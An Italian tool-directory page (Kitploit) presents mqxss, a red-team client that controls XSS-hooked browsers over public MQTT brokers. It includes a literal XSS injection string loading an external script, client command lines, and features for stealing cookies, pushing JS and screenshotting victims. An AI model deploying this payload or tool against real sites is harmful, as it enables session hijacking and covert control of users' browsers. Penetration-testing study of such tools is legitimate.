Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
mqxss — Comunicazione del browser agganciato tramite MQTT. | Kitploit
Strumenti/GitHubGitHub/grampae/mqxss
Generazione di PayloadSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHubgrampae/mqxss

mqxss

Comunicazione del browser agganciato tramite MQTT.

Vedi Repository
832 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

mqxss v0.2

mqxss funge da client per comunicare con browser hookati tramite MQTT

Screenshot from 2023-07-03 15-15-35

Il vantaggio rispetto a beef o xsshunter è che oltre a ospitare il payload js non c'è configurazione dell'infrastruttura, puoi usare un broker pubblico (anche se attualmente usa offuscamento, la crittografia è in lavorazione).

I browser hookati comunicheranno nel topic MQTT sul broker che specifichi; ci sono molti broker pubblici/gratuiti per testare.

Il client utilizza la libreria python paho.mqtt mentre il payload js utilizza 'mqttws31.min.js' che scarica da qui 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.


Indicazioni

Screenshot from 2024-01-17 11-34-59

Per generare un payload JS per hookare i browser, imposta il flag -g all'esecuzione insieme alle variabili broker, porta e topic. In questo modo creerai il tuo payload nella cartella /js/.

Per eseguire il client fornisci broker, porta e topic in questo modo

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

Scarica lo strumento

Per eseguire il client con le credenziali fornisci broker, porta, nome utente, password e topic in questo modo

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

Invia il tuo payload XSS alla vittima mentre il client mqxss è in esecuzione, es.: '"><script src=https://example.com/x.js async></script> o qualcosa di simile; se vulnerabile dovresti ricevere una notifica che dice che il browser si è connesso con alcuni dettagli di base inclusi cookie ecc.

a


Caratteristiche:

  • il payload js utilizza MQTT QoS 1 e Last Will; mqxss verrà notificato di disconnessioni o connessioni che avvengono mentre il client non è connesso al broker
  • genera il payload js all'esecuzione per hookare i browser
  • attualmente funziona solo con broker mqtt che utilizzano websocket sicuri
  • apri la posizione del browser hookato con i cookie catturati nel browser per comodità
  • quando viene hookato cattura cookie, IP, tipo di dispositivo, user agent
  • visualizza i browser hookati in precedenza (non più hookati)
  • invia js ai browser attualmente hookati e ricevi la risposta se disponibile
  • screenshot del browser hookato
  • imposta utente e password per i broker che lo richiedono all'esecuzione
  • notifica pushover impostando le variabili ptoken e userkey in mqxss.py e utilizzando poi il flag da riga di comando -po